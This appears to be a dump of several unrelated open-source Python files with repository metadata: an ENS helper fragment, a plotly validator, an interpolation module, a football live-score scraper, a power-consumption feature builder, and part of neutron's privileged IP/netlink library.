resolver_addr
).transact(transact)
return self._resolverContract(address=resolver_addr)
@dict_copy
def _setup_reverse(
self, name: str, address: ChecksumAddress, transact: "TxParams" = {}
) -> HexBytes:
if name:
name = normalize_name(name)
else:
name = ''
transact['from'] = address
return self._reverse_registrar().functions.setName(name).transact(transact)
def _reverse_registrar(self) -> 'Contract':
addr = self.ens.caller.owner(normal_name_to_hash(REVERSE_REGISTRAR_DOMAIN))
return self.web3.eth.contract(address=addr, abi=abis.REVERSE_REGISTRAR)
| 37.064433
| 100
| 0.630346
|
9a319683472467779aad97a3b6410849b862bc8a
| 440
|
py
|
Python
|
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="histogram2d.colorbar", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs,
)
| 31.428571
| 85
| 0.670455
|
dd40a79298db328cccabd0cff23824aa2bf0ae0c
| 9,327
|
py
|
Python
|
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | 2
|
2021-06-24T15:39:55.000Z
|
2021-06-24T16:57:00.000Z
|
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | null | null | null |
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | null | null | null |
## \file Interpolation.py
# \author Nikitha Krithnan and W. Spencer Smith
# \brief Provides functions for linear interpolation on three-dimensional data
import ReadTable
## \brief Performs linear interpolation
# \param x_1 lower x-coordinate
# \param y_1 lower y-coordinate
# \param x_2 upper x-coordinate
# \param y_2 upper y-coordinate
# \param x x-coordinate to interpolate at
# \return y value interpolated at given x value
def func_lin_interp(x_1, y_1, x_2, y_2, x):
outfile = open("log.txt", "a")
print("function func_lin_interp called with inputs: {", file=outfile)
print(" x_1 = ", end='', file=outfile)
print(x_1, end='', file=outfile)
print(", ", file=outfile)
print(" y_1 = ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(", ", file=outfile)
print(" x_2 = ", end='', file=outfile)
print(x_2, end='', file=outfile)
print(", ", file=outfile)
print(" y_2 = ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, file=outfile)
print(" }", file=outfile)
outfile.close()
return (y_2 - y_1) / (x_2 - x_1) * (x - x_1) + y_1
## \brief Finds the array index for a value closest to the given value
# \param arr array in which value should be found
# \param v value whose index will be found
# \return index of given value in given array
def func_find(arr, v):
outfile = open("log.txt", "a")
print("function func_find called with inputs: {", file=outfile)
print(" arr = ", end='', file=outfile)
print(arr, end='', file=outfile)
print(", ", file=outfile)
print(" v = ", end='', file=outfile)
print(v, file=outfile)
print(" }", file=outfile)
outfile.close()
for i in range(0, len(arr) - 1, 1):
if (arr[i] <= v and v <= arr[i + 1]) :
return i
raise Exception("Bound error")
## \brief Extracts a column from a 2D matrix
# \param mat matrix from which column will be extracted
# \param j index
# \return column of the given matrix at the given index
def func_extractColumn(mat, j):
outfile = open("log.txt", "a")
print("function func_extractColumn called with inputs: {", file=outfile)
print(" mat = ", end='', file=outfile)
print(mat, end='', file=outfile)
print(", ", file=outfile)
print(" j = ", end='', file=outfile)
print(j, file=outfile)
print(" }", file=outfile)
outfile.close()
col = []
for i in range(0, len(mat), 1):
col.append(mat[i][j])
return col
## \brief Linearly interpolates a y value at given x and z values
# \param filename name of file with x y and z data
# \param x x-coordinate to interpolate at
# \param z z-coordinate to interpolate at
# \return y value interpolated at given x and z values
def func_interpY(filename, x, z):
outfile = open("log.txt", "a")
print("function func_interpY called with inputs: {", file=outfile)
print(" filename = ", end='', file=outfile)
print(filename, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, end='', file=outfile)
print(", ", file=outfile)
print(" z = ", end='', file=outfile)
print(z, file=outfile)
print(" }", file=outfile)
outfile.close()
x_matrix = []
y_matrix = []
z_vector = []
ReadTable.func_read_table(filename, z_vector, x_matrix, y_matrix)
i = func_find(z_vector, z)
outfile = open("log.txt", "a")
print("var 'i' assigned to ", end='', file=outfile)
print(i, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_1 = func_extractColumn(x_matrix, i)
outfile = open("log.txt", "a")
print("var 'x_z_1' assigned to ", end='', file=outfile)
print(x_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_1 = func_extractColumn(y_matrix, i)
outfile = open("log.txt", "a")
print("var 'y_z_1' assigned to ", end='', file=outfile)
print(y_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_2 = func_extractColumn(x_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'x_z_2' assigned to ", end='', file=outfile)
print(x_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_2 = func_extractColumn(y_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'y_z_2' assigned to ", end='', file=outfile)
print(y_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
try :
j = func_find(x_z_1, x)
outfile = open("log.txt", "a")
print("var 'j' assigned to ", end='', file=outfile)
print(j, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
k_2 = func_find(x_z_2, x)
outfile = open("log.txt", "a")
print("var 'k_2' assigned to ", end='', file=outfile)
print(k_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
except Exception :
raise Exception("Interpolation of y failed")
y_1 = func_lin_interp(x_z_1[j], y_z_1[j], x_z_1[j + 1], y_z_1[j + 1], x)
outfile = open("log.txt", "a")
print("var 'y_1' assigned to ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_2 = func_lin_interp(x_z_2[k_2], y_z_2[k_2], x_z_2[k_2 + 1], y_z_2[k_2 + 1], x)
outfile = open("log.txt", "a")
print("var 'y_2' assigned to ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
return func_lin_interp(z_vector[i], y_1, z_vector[i + 1], y_2, z)
## \brief Linearly interpolates a z value at given x and y values
# \param filename name of file with x y and z data
# \param x x-coordinate to interpolate at
# \param y y-coordinate to interpolate at
# \return z value interpolated at given x and y values
def func_interpZ(filename, x, y):
outfile = open("log.txt", "a")
print("function func_interpZ called with inputs: {", file=outfile)
print(" filename = ", end='', file=outfile)
print(filename, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, end='', file=outfile)
print(", ", file=outfile)
print(" y = ", end='', file=outfile)
print(y, file=outfile)
print(" }", file=outfile)
outfile.close()
x_matrix = []
y_matrix = []
z_vector = []
ReadTable.func_read_table(filename, z_vector, x_matrix, y_matrix)
for i in range(0, len(z_vector) - 1, 1):
x_z_1 = func_extractColumn(x_matrix, i)
outfile = open("log.txt", "a")
print("var 'x_z_1' assigned to ", end='', file=outfile)
print(x_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_1 = func_extractColumn(y_matrix, i)
outfile = open("log.txt", "a")
print("var 'y_z_1' assigned to ", end='', file=outfile)
print(y_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_2 = func_extractColumn(x_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'x_z_2' assigned to ", end='', file=outfile)
print(x_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_2 = func_extractColumn(y_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'y_z_2' assigned to ", end='', file=outfile)
print(y_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
try :
j = func_find(x_z_1, x)
outfile = open("log.txt", "a")
print("var 'j' assigned to ", end='', file=outfile)
print(j, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
k_2 = func_find(x_z_2, x)
outfile = open("log.txt", "a")
print("var 'k_2' assigned to ", end='', file=outfile)
print(k_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
except Exception :
continue
y_1 = func_lin_interp(x_z_1[j], y_z_1[j], x_z_1[j + 1], y_z_1[j + 1], x)
outfile = open("log.txt", "a")
print("var 'y_1' assigned to ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_2 = func_lin_interp(x_z_2[k_2], y_z_2[k_2], x_z_2[k_2 + 1], y_z_2[k_2 + 1], x)
outfile = open("log.txt", "a")
print("var 'y_2' assigned to ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
if (y_1 <= y and y <= y_2) :
return func_lin_interp(y_1, z_vector[i], y_2, z_vector[i + 1], y)
raise Exception("Interpolation of z failed")
| 39.689362
| 88
| 0.604803
|
b0f8ba0dff5eebe7506a4bd4803fa885aeca1a46
| 6,509
|
py
|
Python
|
crawler.py
|
AlisonJonantan/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | 5
|
2018-08-08T20:38:57.000Z
|
2022-02-01T15:21:58.000Z
|
crawler.py
|
Maarcosv99/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | null | null | null |
crawler.py
|
Maarcosv99/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | 5
|
2018-08-01T17:58:28.000Z
|
2022-02-11T03:35:09.000Z
|
import requests
from bs4 import BeautifulSoup
from administracao.models import Analise, Prognostico
from core.models import JogoAnaliseAoVivo, JogoAoVivo
# CRAWLER DO PLACAR DE FUTEBOL
def autenticacaoPlacar():
url = 'https://www.placardefutebol.com.br/jogos-de-hoje'
proxies = {'http': '107.170.42.158:80'}
r = requests.get(url)
soup = BeautifulSoup(r.text, 'lxml')
return soup
def jogos():
soup = autenticacaoPlacar()
url = 'https://www.placardefutebol.com.br'
campeonatos = soup.find('div', {'id': 'livescore'}).find_all('div', {'class': 'container content'})
todos_jogos = []
for campeonato in campeonatos:
jogos = campeonato.find_all('a')
for jogo in jogos:
jogo = dados_jogo(jogo)
if not 'erro' in jogo:
if jogo['time_casa'] and jogo['time_fora']:
if jogo['status']:
index = str(jogo['status'])
if jogo['status'] == 'AO VIVO' or index.find('MIN') > 0:
todos_jogos.append(jogo)
return todos_jogos
def dados_jogo(jogo):
url = 'https://www.placardefutebol.com.br'
jogo_link = '{0}{1}'.format(url, jogo['href'])
erro = False
try:
jogo_status = jogo.find('span', {'class': 'status-name'}).string
except AttributeError:
erro = True
if erro:
return ({'erro': erro})
jogo_time_casa = jogo.find('h5', {'class': 'text-right team_link'}).string
try:
jogo_time_casa_gols = jogo.find({'class':'match-score'}).find({'class':'badge'}).string
print('Time casa gols:' + jogo_time_casa_gols)
except AttributeError:
jogo_time_casa_gols = '0'
jogo_time_fora = jogo.find('h5', {'class': 'text-left team_link'}).string
try:
jogo_time_fora_gols = jogo.find_all(class_='match-score')[1].find(class_='badge').string
print('Time fora gols:' + jogo_time_fora_gols)
except AttributeError:
jogo_time_fora_gols = '0'
return {'link': jogo_link, 'status': jogo_status, 'time_casa': jogo_time_casa, 'time_casa_gol': jogo_time_casa_gols,
'time_fora': jogo_time_fora, 'time_fora_gol': jogo_time_fora_gols}
def procurar_jogo(todos_jogos, time_casa, time_fora):
for jogo in todos_jogos:
if jogo['time_casa'].find(time_casa) >= 0 and jogo['time_fora'].find(time_fora) >= 0:
return jogo
return False
def status_gol(jogo):
link = jogo['link']
r = requests.get(link)
soup = BeautifulSoup(r.text, 'lxml')
eventos_casa = soup.find_all('div', {'class': 'match-card-events-home-team'})
eventos_fora = soup.find_all('div', {'class': 'match-card-events-away-team'})
gols_casa_ft = 0
gols_casa_ht = 0
for evento_casa in eventos_casa:
try:
gols_casa = evento_casa.find_all('i', {'class': 'fa fa-futbol-o'})
for gol_casa in gols_casa:
gols_casa_ft += 1
tempo_do_gol = gol_casa.next_sibling
tempo_do_gol = int(tempo_do_gol.replace(" - ", "").replace("'", ""))
if tempo_do_gol <= 45:
gols_casa_ht += 1
except:
gols_casa = 0
gols_fora_ft = 0
gols_fora_ht = 0
for evento_fora in eventos_fora:
try:
gols_fora = evento_fora.find_all('i', {'class': 'fa fa-futbol-o'})
for gol_fora in gols_fora:
gols_fora_ft += 1
tempo_do_gol = gol_fora.previous_sibling
tempo_do_gol = int(tempo_do_gol[:1])
if tempo_do_gol <= 45:
gols_fora_ht += 1
except:
gols_fora = 0
return {'CasaHT': gols_casa_ht, 'CasaFT': gols_casa_ft, 'ForaHT': gols_fora_ht, 'ForaFT': gols_fora_ft}
def jogoAnaliseAoVivo(todos_jogos):
ultimaAnalise = Analise.objects.order_by('id').last()
prognosticos = Prognostico.objects.all().filter(analise=ultimaAnalise).order_by('-id')
tamanho_lista = len(prognosticos)
index = 0
for jogo in prognosticos:
index += 1
response = procurar_jogo(todos_jogos, jogo.time_casa, jogo.time_fora)
if response:
if type(response) is dict:
try:
instancia = JogoAnaliseAoVivo.objects.order_by('id').last()
except:
instancia = JogoAnaliseAoVivo(
time_casa=response['time_casa'],
time_casa_gol=response['time_casa_gol'],
time_fora=response['time_fora'],
time_fora_gol=response['time_fora_gol'],
tip=jogo.entrada)
instancia.save()
break
return True
instancia.time_casa = response['time_casa']
instancia.time_casa_gol = response['time_casa_gol']
instancia.time_fora = response['time_fora']
instancia.time_fora_gol = response['time_fora_gol']
instancia.tip = jogo.entrada
instancia.save()
break
return True
elif index == (tamanho_lista - 1):
instancia = JogoAnaliseAoVivo.objects.order_by('id').last()
instancia.time_casa = None
instancia.time_casa_gol = None
instancia.time_fora = None
instancia.time_fora_gol = None
instancia.tip = None
instancia.save()
return True
def jogoAoVivo(todos_jogos):
jogo = todos_jogos[0]
if not jogo:
instancia = JogoAoVivo.objects.order_by('id').last()
instancia.time_casa = None
instancia.time_casa_gol = None
instancia.time_fora = None
instancia.time_fora_gol = None
instancia.save()
return True
else:
try:
instancia = JogoAoVivo.objects.order_by('id').last()
except:
instancia = JogoAoVivo(
time_casa=jogo['time_casa'],
time_casa_gol=jogo['time_casa_gol'],
time_fora=jogo['time_fora'],
time_fora_gol=jogo['time_fora_gol'])
instancia.save()
return True
instancia.time_casa = jogo['time_casa']
instancia.time_casa_gol = jogo['time_casa_gol']
instancia.time_fora = jogo['time_fora']
instancia.time_fora_gol = jogo['time_fora_gol']
instancia.save()
return True
| 36.161111
| 120
| 0.584268
|
eae8f927d0fdb4a9d3b14261b008b52ad0300f41
| 4,794
|
py
|
Python
|
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | 13
|
2017-08-18T02:15:05.000Z
|
2019-11-06T12:57:31.000Z
|
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | null | null | null |
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | 11
|
2017-08-09T08:08:00.000Z
|
2019-11-06T12:57:35.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 18 19:17:04 2017
@author: boweiy
"""
import pandas as pd
import numpy as np
from multiprocessing import Pool as m_Pool
from preprocess import get_dataset,get_user_id_list,increase_index
from preprocess import save_month_df,save_history_df
from preprocess import check_empty,filter_user_id
def make_features(user_id,user_df):
"""
构造单天特征
"""
print 'user_id:', user_id
power = user_df.power_consumption
assert power.index[0] == user_df.index[0]
assert len(user_df.index) == 639
new_df = pd.DataFrame(index=user_df.index.union(pd.date_range('2016-9-1','2016-9-30')))
pw_new = power.copy()
#predict 30 days and 30days for features
for d in range(60):
pw_new.index += pd.Timedelta('1D')
new_df['power#-%d'%(d+1)] = pw_new
#create 30 models
for d in range(30):
#30 days features
x_ = new_df[new_df.columns[d:30+d]]
x_['y'] = power
x_.to_csv('./features/day_model/%d/%d.csv'%(d+1,user_id))
#return x_
def make_month_features(user_id,user_df):
"""
构造单天特征
"""
print 'user_id:', user_id
power = user_df.power_consumption.copy()
assert power.index[0] == user_df.index[0]
new_df = pd.DataFrame(index=user_df.index.union(pd.date_range('2016-10-1','2016-10-31')))
pw_new = power.copy()
#predict 30 days and 30days for features
for d in range(30):
pw_new.index += pd.Timedelta('1D')
new_df['power#-%d'%(d+1)] = pw_new
#create 30 models
for d in range(31):
#30 days features
new_df['y#%d'%d] = power
power.index -= pd.Timedelta('1D')
save_month_df(new_df,user_id)
return new_df
def make_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption.apply(np.log)
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
#p.apply_async(make_features,args=(arg))
p.apply_async(make_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
def history_feature(user_df):
user_pow_last_year = user_df.ix[user_df.index <'2016-1-1']
user_pow_last_year = increase_index(user_pow_last_year)
#weekly average
weekly_roll = user_pow_last_year.rolling(7,center=True)
weekly_median = weekly_roll.median()
weekly_max = weekly_roll.max()
weekly_min = weekly_roll.min()
#weekly2 average
weekly2_roll = user_pow_last_year.rolling(14,center=True)
weekly2_median = weekly2_roll.median()
#monthly average
monthly_roll = user_pow_last_year.rolling(30,center=True)
monthly_median = monthly_roll.median()
feature_index = user_pow_last_year.index[user_pow_last_year.index<'2016-10-30']
feature_df = pd.DataFrame(index = feature_index)
feature_df['weekly_median'] = weekly_median
feature_df['weekly_max'] = weekly_max
feature_df['weekly_min'] = weekly_min
feature_df['weekly2_median'] = weekly2_median
feature_df['monthly_median'] = monthly_median
feature_df = feature_df.dropna()
feature_df = feature_df.apply(np.log)
return feature_df
def make_history_month_features(user_id,user_df):
"""
构造单天特征
"""
print 'user_id:', user_id
power = user_df.power_consumption.copy()
feature_df = history_feature(power)
new_df = pd.DataFrame(index = feature_df.index)
#create 30 models
for d in range(30):
for cols in feature_df:
#30 days features
new_df[cols+'#%d'%d] = feature_df[cols]
feature_df.index -= pd.Timedelta('1D')
new_df = new_df.dropna()
save_history_df(new_df.dropna(),user_id)
return new_df
def make_history_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
p.apply_async(make_history_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
if __name__ == '__main__':
make_month_features_all()
#make_history_month_features_all()
| 32.835616
| 93
| 0.666458
|
fcf4889933740a449feedd6cfb64149050165b8f
| 25,122
|
py
|
Python
|
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
neutron/privileged/agent/linux/ip_lib.py
|
1pintbeer/neutron
|
f5a827c2be06f24a1f8025f120f16c12eb1b1f55
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import socket
from neutron_lib import constants
from oslo_concurrency import lockutils
import pyroute2
from pyroute2 import netlink
from pyroute2.netlink import exceptions as netlink_exceptions
from pyroute2.netlink import rtnl
from pyroute2.netlink.rtnl import ifinfmsg
from pyroute2.netlink.rtnl import ndmsg
from pyroute2 import NetlinkError
from pyroute2 import netns
import six
from neutron._i18n import _
from neutron import privileged
_IP_VERSION_FAMILY_MAP = {4: socket.AF_INET, 6: socket.AF_INET6}
NETNS_RUN_DIR = '/var/run/netns'
@lockutils.synchronized("privileged-ip-lib")
# NOTE(slaweq): Because of issue with pyroute2.NetNS objects running in threads
# we need to lock this function to workaround this issue.
# For details please check https://bugs.launchpad.net/neutron/+bug/1811515
def _sync(input_func):
# NOTE(ralonsoh): this is needed because PY2 functools.update_wrapper do
# not handle correctly partial functions (nested decorators). This could be
# removed once we abandon support for PY2.
if six.PY2 and isinstance(input_func, functools.partial):
for asig in functools.WRAPPER_ASSIGNMENTS:
setattr(input_func, asig, '')
@six.wraps(input_func)
def sync_inner(*args, **kwargs):
return input_func(*args, **kwargs)
return sync_inner
def _get_scope_name(scope):
"""Return the name of the scope (given as a number), or the scope number
if the name is unknown.
For backward compatibility (with "ip" tool) "global" scope is converted to
"universe" before converting to number
"""
scope = 'universe' if scope == 'global' else scope
return rtnl.rt_scope.get(scope, scope)
class NetworkNamespaceNotFound(RuntimeError):
message = _("Network namespace %(netns_name)s could not be found.")
def __init__(self, netns_name):
super(NetworkNamespaceNotFound, self).__init__(
self.message % {'netns_name': netns_name})
class NetworkInterfaceNotFound(RuntimeError):
message = _("Network interface %(device)s not found in namespace "
"%(namespace)s.")
def __init__(self, message=None, device=None, namespace=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {
'device': device, 'namespace': namespace}
super(NetworkInterfaceNotFound, self).__init__(message)
class InterfaceOperationNotSupported(RuntimeError):
message = _("Operation not supported on interface %(device)s, namespace "
"%(namespace)s.")
def __init__(self, message=None, device=None, namespace=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {
'device': device, 'namespace': namespace}
super(InterfaceOperationNotSupported, self).__init__(message)
class IpAddressAlreadyExists(RuntimeError):
message = _("IP address %(ip)s already configured on %(device)s.")
def __init__(self, message=None, ip=None, device=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {'ip': ip, 'device': device}
super(IpAddressAlreadyExists, self).__init__(message)
class InterfaceAlreadyExists(RuntimeError):
message = _("Interface %(device)s already exists.")
def __init__(self, message=None, device=None):
# NOTE(slaweq): 'message' can be passed as an optional argument
# because of how privsep daemon works. If exception is raised in
# function called by privsep daemon, it will then try to reraise it
# and will call it always with passing only message from originally
# raised exception.
message = message or self.message % {'device': device}
super(InterfaceAlreadyExists, self).__init__(message)
def _make_route_dict(destination, nexthop, device, scope):
return {'destination': destination,
'nexthop': nexthop,
'device': device,
'scope': scope}
@_sync
@privileged.default.entrypoint
def get_routing_table(ip_version, namespace=None):
"""Return a list of dictionaries, each representing a route.
:param ip_version: IP version of routes to return, for example 4
:param namespace: The name of the namespace from which to get the routes
:return: a list of dictionaries, each representing a route.
The dictionary format is: {'destination': cidr,
'nexthop': ip,
'device': device_name,
'scope': scope}
"""
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
netns = pyroute2.NetNS(namespace, flags=0) if namespace else None
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
routes = []
with pyroute2.IPDB(nl=netns) as ipdb:
ipdb_routes = ipdb.routes
ipdb_interfaces = ipdb.interfaces
for route in ipdb_routes:
if route['family'] != family:
continue
dst = route['dst']
nexthop = route.get('gateway')
oif = route.get('oif')
scope = _get_scope_name(route['scope'])
# If there is not a valid outgoing interface id, check if
# this is a multipath route (i.e. same destination with
# multiple outgoing interfaces)
if oif:
device = ipdb_interfaces[oif]['ifname']
rt = _make_route_dict(dst, nexthop, device, scope)
routes.append(rt)
elif route.get('multipath'):
for mpr in route['multipath']:
oif = mpr['oif']
device = ipdb_interfaces[oif]['ifname']
rt = _make_route_dict(dst, nexthop, device, scope)
routes.append(rt)
return routes
def get_iproute(namespace):
# From iproute.py:
# `IPRoute` -- RTNL API to the current network namespace
# `NetNS` -- RTNL API to another network namespace
if namespace:
# do not try and create the namespace
return pyroute2.NetNS(namespace, flags=0)
else:
return pyroute2.IPRoute()
@_sync
@privileged.default.entrypoint
def open_namespace(namespace):
"""Open namespace to test if the namespace is ready to be manipulated"""
with pyroute2.NetNS(namespace, flags=0):
pass
@privileged.default.entrypoint
def list_ns_pids(namespace):
"""List namespace process PIDs
Based on Pyroute2.netns.ns_pids(). Remove when
https://github.com/svinota/pyroute2/issues/633 is fixed.
"""
ns_pids = []
try:
ns_path = os.path.join(NETNS_RUN_DIR, namespace)
ns_inode = os.stat(ns_path).st_ino
except OSError:
return ns_pids
for pid in os.listdir('/proc'):
if not pid.isdigit():
continue
try:
pid_path = os.path.join('/proc', pid, 'ns', 'net')
if os.stat(pid_path).st_ino == ns_inode:
ns_pids.append(int(pid))
except OSError:
continue
return ns_pids
def _translate_ip_device_exception(e, device=None, namespace=None):
if e.code == errno.ENODEV:
raise NetworkInterfaceNotFound(device=device, namespace=namespace)
if e.code == errno.EOPNOTSUPP:
raise InterfaceOperationNotSupported(device=device,
namespace=namespace)
def get_link_id(device, namespace):
try:
with get_iproute(namespace) as ip:
return ip.link_lookup(ifname=device)[0]
except IndexError:
raise NetworkInterfaceNotFound(device=device, namespace=namespace)
def _run_iproute_link(command, device, namespace=None, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.link(command, index=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _run_iproute_neigh(command, device, namespace, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.neigh(command, ifindex=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
def _run_iproute_addr(command, device, namespace, **kwargs):
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
return ip.addr(command, index=idx, **kwargs)
except NetlinkError as e:
_translate_ip_device_exception(e, device, namespace)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def add_ip_address(ip_version, ip, prefixlen, device, namespace, scope,
broadcast=None):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_addr('add',
device,
namespace,
address=ip,
mask=prefixlen,
family=family,
broadcast=broadcast,
scope=_get_scope_name(scope))
except NetlinkError as e:
if e.code == errno.EEXIST:
raise IpAddressAlreadyExists(ip=ip, device=device)
raise
@_sync
@privileged.default.entrypoint
def delete_ip_address(ip_version, ip, prefixlen, device, namespace):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
_run_iproute_addr("delete",
device,
namespace,
address=ip,
mask=prefixlen,
family=family)
except NetlinkError as e:
# when trying to delete a non-existent IP address, pyroute2 raises
# NetlinkError with code EADDRNOTAVAIL (99, 'Cannot assign requested
# address')
# this shouldn't raise an error
if e.code == errno.EADDRNOTAVAIL:
return
raise
@_sync
@privileged.default.entrypoint
def flush_ip_addresses(ip_version, device, namespace):
family = _IP_VERSION_FAMILY_MAP[ip_version]
try:
with get_iproute(namespace) as ip:
idx = get_link_id(device, namespace)
ip.flush_addr(index=idx, family=family)
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
def create_interface(ifname, namespace, kind, **kwargs):
ifname = ifname[:constants.DEVICE_NAME_MAX_LEN]
try:
with get_iproute(namespace) as ip:
physical_interface = kwargs.pop("physical_interface", None)
if physical_interface:
link_key = "vxlan_link" if kind == "vxlan" else "link"
kwargs[link_key] = get_link_id(physical_interface, namespace)
return ip.link("add", ifname=ifname, kind=kind, **kwargs)
except NetlinkError as e:
if e.code == errno.EEXIST:
raise InterfaceAlreadyExists(device=ifname)
raise
except OSError as e:
if e.errno == errno.ENOENT:
raise NetworkNamespaceNotFound(netns_name=namespace)
raise
@_sync
@privileged.default.entrypoint
